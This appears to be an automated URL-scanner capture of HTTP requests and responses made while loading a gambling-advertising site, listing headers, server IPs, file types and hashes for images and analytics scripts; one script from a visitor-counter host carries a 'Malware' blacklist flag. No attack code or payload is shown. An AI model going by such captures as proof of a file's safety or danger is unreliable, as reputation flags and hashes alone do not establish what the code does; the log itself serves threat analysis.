User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         212.98.178.206
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: Tengine
Content-Length: 74865
Connection: keep-alive
Date: Tue, 20 Jun 2017 22:49:31 GMT
Accept-Ranges: bytes
Etag: "2833254805"
Last-Modified: Wed, 04 May 2016 08:22:34 GMT
Expires: Sat, 04 May 2019 09:26:50 GMT
Cache-Control: max-age=94608000
Server-Name: trackerD04.qd
Via: cache3.l2hk1[0,200-0,H], cache29.l2hk1[1,0], cache5.by1[0,200-0,H], cache2.by1[2,0]
Age: 2294703
X-Cache: HIT TCP_HIT dirn:1:340019970
X-Swift-SaveTime: Fri, 23 Jun 2017 00:39:33 GMT
X-Swift-CacheTime: 2592000
Timing-Allow-Origin: *
EagleId: d462b28415002936743925406e


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   74865
Md5:    4505eb8b1f19b3136ab45fb43959f0bb
Sha1:   0eddf8bfccfc39ab669e62da355e72d2aa905ba0
Sha256: f8c5a311848fcfd3d755494e0512b3e3113a22689118826b6ef9eb12277e128d
                                        
                                            GET /050E00005767AAB267BC3C137009C39B HTTP/1.1 
Host: r3.ykimg.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         212.98.178.206
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: Tengine
Content-Length: 129168
Connection: keep-alive
Date: Mon, 20 Jun 2016 09:06:49 GMT
Accept-Ranges: bytes
Etag: "431444470"
Last-Modified: Mon, 20 Jun 2016 08:36:45 GMT
Expires: Thu, 20 Jun 2019 09:06:49 GMT
Cache-Control: max-age=94608000
Server-Name: trackerA09.aw
Via: cache20.l2sg1[0,200-0,H], cache30.l2sg1[0,0], cache4.by1[0,200-0,H], cache3.by1[1,0]
Age: 33880065
X-Cache: HIT TCP_HIT dirn:9:583905263
X-Swift-SaveTime: Mon, 20 Jun 2016 16:06:25 GMT
X-Swift-CacheTime: 94582824
Timing-Allow-Origin: *
EagleId: d462b28515002936744048128e


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   129168
Md5:    a79fcd799923812900e81db5e4e4b2c2
Sha1:   f370464d9e737c74c12bb35ef59e7bb22031619d
Sha256: f497942fab629b4d5b0e6a1397cd08f6346000e436102774e047148cfcadb947
                                        
                                            GET /19149991.js HTTP/1.1 
Host: js.users.51.la
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         113.107.42.35
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                        
Cache-Control: max-age=300
Content-Length: 1859
Last-Modified: Sat, 01 Apr 2017 06:40:01 GMT
Accept-Ranges: bytes
Etag: "9ebbfac9b2aad21:5db8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Jul 2017 12:08:18 GMT
Connection: close


--- Additional Info ---
Magic:  ASCII text, with very long lines, with CRLF line terminators
Size:   1859
Md5:    e4e04087ce39526ffe0f6a3db8c67837
Sha1:   45ffa5e73a07259c218af0baae2d5e2d07272d5c
Sha256: bc153db858c7f5dd977140794b225edff11ccfcadd2ccf057652962b5f164d43

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /dypcimg/tv/img/6/16/sup48994_223x310.jpg HTTP/1.1 
Host: imgwx3.2345.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         42.62.60.250
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Last-Modified: Thu, 18 May 2017 05:22:46 GMT
Expires: Mon, 17 Jul 2017 12:15:49 GMT
Cache-Control: max-age=7200
Content-Length: 19735
Accept-Ranges: bytes
Date: Mon, 17 Jul 2017 12:14:35 GMT
Age: 7125
Connection: keep-alive
x-hits: 37


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, comment: "CREATOR: gd-jpeg v1.0 (using IJ"
Size:   19735
Md5:    c64feeb805add0e52fb4cfccb56147e4
Sha1:   dd15b4ec9754b4cda04b2cb47fe22a6de2e55191
Sha256: fe0e5e944a2fbdc0877951a225600c8d6d4ac89f1d443025472aab3ed68cfddd
                                        
                                            POST / HTTP/1.1 
Host: ss.symcd.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         23.43.139.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx/1.10.2
Content-Length: 1609
Content-Transfer-Encoding: binary
Cache-Control: max-age=543897, public, no-transform, must-revalidate
Last-Modified: Sun, 16 Jul 2017 19:16:37 GMT
Expires: Sun, 23 Jul 2017 19:16:37 GMT
Date: Mon, 17 Jul 2017 12:14:39 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1609
Md5:    e0a04392219e7c037668d3609182d48b
Sha1:   59af7b5cc5ae365bdecd9c538f1d1e00e4470b65
Sha256: ed30eafc2cda292c0c8427c8d83aa0ad444b08bc665d3c8760200d8edb9ea79d
                                        
                                            GET /go.asp?svid=17&id=19149991&tpages=1&ttimes=1&tzone=2&tcolor=24&sSize=1176,885&referrer=http%3A//www.hzminda.com/read/432089.html&vpage=http%3A//tiantianfa.cc/&vvtime=1500293677590 HTTP/1.1 
Host: web.users.51.la
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         42.236.74.236
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Mon, 17 Jul 2017 12:14:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Expires: Sun, 16 Jul 2017 19:34:32 GMT
Cache-Control: private


--- Additional Info ---
                                        
                                            GET /images/by-1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:14 GMT
Content-Length: 167543
Last-Modified: Thu, 08 Jun 2017 03:05:10 GMT
Connection: keep-alive
Etag: "5938bee6-28e77"
Expires: Wed, 16 Aug 2017 12:16:14 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   167543
Md5:    a5b964c5e69800fc37803ee3c6305e7a
Sha1:   443364419bd7041fd67f30d06dd23caa0c7dcb84
Sha256: a6f02931a65f616664f9dba4119b9190c909a7704696e70bb9689929d0fc2758
                                        
                                            GET /images/jsyl1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:15 GMT
Content-Length: 143393
Last-Modified: Wed, 05 Jul 2017 06:22:30 GMT
Connection: keep-alive
Etag: "595c85a6-23021"
Expires: Wed, 16 Aug 2017 12:16:15 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1100 x 70
Size:   143393
Md5:    eb44b96b6eb63f782221a78d36d56aa3
Sha1:   8115ee811b62eaade6895ff464f036b4d8a38914
Sha256: b043a4bbcbab7f67b7a50ea62549f9b3287dab405049c94da552436895958e32
                                        
                                            GET /hm.js?bca3abc10efb3db6b97bf25d2e76a2e6 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         220.181.7.190
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Length: 8615
Date: Mon, 17 Jul 2017 12:14:40 GMT
Etag: 1a038e22d9dddc9414f6e278a14a8d25
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: apache
Set-Cookie: HMACCOUNT=3898F99A60867041; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT


--- Additional Info ---
Magic:  gzip compressed data, from Unix, max speed
Size:   8615
Md5:    ca3219f36efa556a5a0cc09b3f1002d5
Sha1:   71b53a3c130edfeb9e86efe928511ff0ca5697ea
Sha256: c01f3cb27e0017584901c919495276b702d410ab35ab3e45913e2c92c7ca3dba
                                        
                                            GET /images/ylhg-1000x50.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:22 GMT
Content-Length: 37509
Last-Modified: Wed, 21 Jun 2017 04:41:19 GMT
Connection: keep-alive
Etag: "5949f8ef-9285"
Expires: Wed, 16 Aug 2017 12:16:22 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 50
Size:   37509
Md5:    9901c600fc94b22e9b1da252a3ed0be9
Sha1:   dd3606a094890c35a2df6753faca2be680b26fab
Sha256: 954771679c5e44c0e80bae5e901e7db1d0784ba55655857d11dbc928e887f905
                                        
                                            GET /hm.gif?cc=0&ck=1&cl=24-bit&ds=1176x885&et=0&fl=10.0&ja=1&ln=en-us&lo=0&nv=1&rnd=4178959&si=bca3abc10efb3db6b97bf25d2e76a2e6&st=3&su=http%3A%2F%2Fwww.hzminda.com%2Fread%2F432089.html&v=1.2.16&lv=1&ct=!!&tt=%E5%A4%A9%E5%A4%A9%E5%8F%91%E5%8F%91%E6%8E%A8%E8%8D%90%E7%BD%91&sn=932 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/
Cookie: HMACCOUNT=3898F99A60867041

                                         
                                         220.181.7.190
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Mon, 17 Jul 2017 12:14:47 GMT
Pragma: no-cache
Server: apache
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /images/bg-1000x66.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:15 GMT
Content-Length: 260420
Last-Modified: Tue, 06 Jun 2017 07:06:38 GMT
Connection: keep-alive
Etag: "5936547e-3f944"
Expires: Wed, 16 Aug 2017 12:16:15 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 55
Size:   260420
Md5:    bc1a51f5f5754caaa4c88e91220ca19b
Sha1:   ea2a891bd01a73dfb7d4636eb0e6621188abfb2b
Sha256: e2f35f65180c23234e1b950d7b3b13c6b5c35bbc4c71eb392a4da3caa44c7941
                                        
                                            GET /images/w88-312x153.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:14 GMT
Content-Length: 192494
Last-Modified: Sat, 01 Apr 2017 06:13:49 GMT
Connection: keep-alive
Etag: "58df451d-2efee"
Expires: Wed, 16 Aug 2017 12:16:14 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 400 x 198
Size:   192494
Md5:    65c1a6a0e8da2e71e52c33df1614c0a9
Sha1:   12cffae570b71ed5e2210fd095952e49e16273f9
Sha256: 14c9fab6c953583f43335cb56f7cc6b765ec25f7f34c193cf6fdce0f2250e7f2
                                        
                                            GET /images/tyc-1-1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:15 GMT
Content-Length: 208683
Last-Modified: Wed, 17 May 2017 06:20:34 GMT
Connection: keep-alive
Etag: "591bebb2-32f2b"
Expires: Wed, 16 Aug 2017 12:16:15 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   208683
Md5:    79148f9865e8e5054d16fc5d60125e4d
Sha1:   a117d4766617f63c658d869d6db88bb7dbfa92d7
Sha256: 2ee5e638dff3d64ddd797b6e7ecbba59eb673ed2dd1a089cee6a83c441d0b455
                                        
                                            GET /images/bet-1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:29 GMT
Content-Length: 136065
Last-Modified: Tue, 13 Jun 2017 09:43:40 GMT
Connection: keep-alive
Etag: "593fb3cc-21381"
Expires: Wed, 16 Aug 2017 12:16:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   136065
Md5:    d3320fbe829072f12797e13ce0af02d4
Sha1:   490e88d8007edfca2c5cd73d2c5b4c2bd9bf6a79
Sha256: fcd97372c89d089f6c337c8c9a2999fc8e58996ffbcee90dd582929f79465292
                                        
                                            GET /images/yd-1-1000x66.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:20 GMT
Content-Length: 263635
Last-Modified: Tue, 13 Jun 2017 08:18:46 GMT
Connection: keep-alive
Etag: "593f9fe6-405d3"
Expires: Wed, 16 Aug 2017 12:16:20 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 66
Size:   263635
Md5:    2652ad3c55b94a9a7abd09b8cd3bcd73
Sha1:   95fadb290e368b6c81c900cdb6363b39178e5df3
Sha256: 8cb02e2093ca9281c3402edcb949cb0b557aa694ce6d34c80ad90ade005721a3
                                        
                                            GET /images/vnr6-1000X60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:38 GMT
Content-Length: 25135
Last-Modified: Mon, 29 May 2017 04:40:31 GMT
Connection: keep-alive
Etag: "592ba63f-622f"
Expires: Wed, 16 Aug 2017 12:16:38 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   25135
Md5:    0d3a9a269ce8df96c82eaf46cdd9a339
Sha1:   ea82a5a7898fc8d8d3fedff3597a3b428afc56c2
Sha256: 9cd64092ec4f9b040ce1f1b523f24c553899dbbec5500112f1a8189534c0fc5d
                                        
                                            GET /images/amxj-1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:30 GMT
Content-Length: 109035
Last-Modified: Tue, 13 Jun 2017 09:43:10 GMT
Connection: keep-alive
Etag: "593fb3ae-1a9eb"
Expires: Wed, 16 Aug 2017 12:16:30 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   109035
Md5:    9a8fbb00446f6a4a31a126cb9ed623fc
Sha1:   c2342f297db36e2876b5da3d4bbf341578fcdf04
Sha256: 3b8c2838c5c22aa621ff43834ec140797659ea7bfb13cd615bb42767cdbbc90f
                                        
                                            GET /images/wnv-645x50.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:14 GMT
Content-Length: 392921
Last-Modified: Fri, 30 Jun 2017 11:18:00 GMT
Connection: keep-alive
Etag: "59563368-5fed9"
Expires: Wed, 16 Aug 2017 12:16:14 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 645 x 50
Size:   392921
Md5:    7285255bf5158539228b87733ccfc56f
Sha1:   a33352cb40c347a0f9cc15cba9395a2d8ad89d54
Sha256: 898f91fc76f31fe5e65099e98dc6804c074e43e8e1a6b9b3c9c5e375e45b4d3e
                                        
                                            GET /images/vnsr1000x70.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:28 GMT
Content-Length: 243025
Last-Modified: Mon, 17 Jul 2017 08:00:26 GMT
Connection: keep-alive
Etag: "596c6e9a-3b551"
Expires: Wed, 16 Aug 2017 12:16:28 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   243025
Md5:    586916fc0de03619a0506ac01367fb1b
Sha1:   3da3f3f23a0157b06593557610670fcfd3a54c02
Sha256: 92c5e1388dc9dff06bca96d6669c8616005b05f5e96ce051f2e24c0cfab3c859
                                        
                                            GET /images/mklt-1000x80.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:39 GMT
Content-Length: 118968
Last-Modified: Tue, 27 Jun 2017 10:31:03 GMT
Connection: keep-alive
Etag: "595233e7-1d0b8"
Expires: Wed, 16 Aug 2017 12:16:39 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 960 x 50
Size:   118968
Md5:    95ee08c479e92bdeac90510b26c2c990
Sha1:   677a5538454981f9327c3c5253fd6414eaf52027
Sha256: ec5c9da99a7e14970c3da102335666f3f33b3ac56c009daf0da35b7356649663
                                        
                                            GET /images/mgm1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:28 GMT
Content-Length: 207132
Last-Modified: Mon, 17 Jul 2017 08:01:01 GMT
Connection: keep-alive
Etag: "596c6ebd-3291c"
Expires: Wed, 16 Aug 2017 12:16:28 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   207132
Md5:    929b53489c6626a9b11407c18f075cb1
Sha1:   c28350c6546b2aa5ce009195459dd36674f8c94b
Sha256: cf76896a314edd24b694fc95afb8196f1ef423b91d3740c680618258448ca949
                                        
                                            GET /images/4242_960x50.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:40 GMT
Content-Length: 201214
Last-Modified: Thu, 25 May 2017 08:01:30 GMT
Connection: keep-alive
Etag: "59268f5a-311fe"
Expires: Wed, 16 Aug 2017 12:16:40 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 960 x 50
Size:   201214
Md5:    11c89d51d18caa3002d9ca4dea458dfd
Sha1:   721fdbf0f0cc124d6ac9664b0701b4ab740d7791
Sha256: 4b4133160ff8263123d17f72ee6fcaf0207e271aba8272bfe61e3c1336424e1e
                                        
                                            GET /images/bly-1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:49 GMT
Content-Length: 72907
Last-Modified: Thu, 15 Jun 2017 07:38:05 GMT
Connection: keep-alive
Etag: "5942395d-11ccb"
Expires: Wed, 16 Aug 2017 12:16:49 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   72907
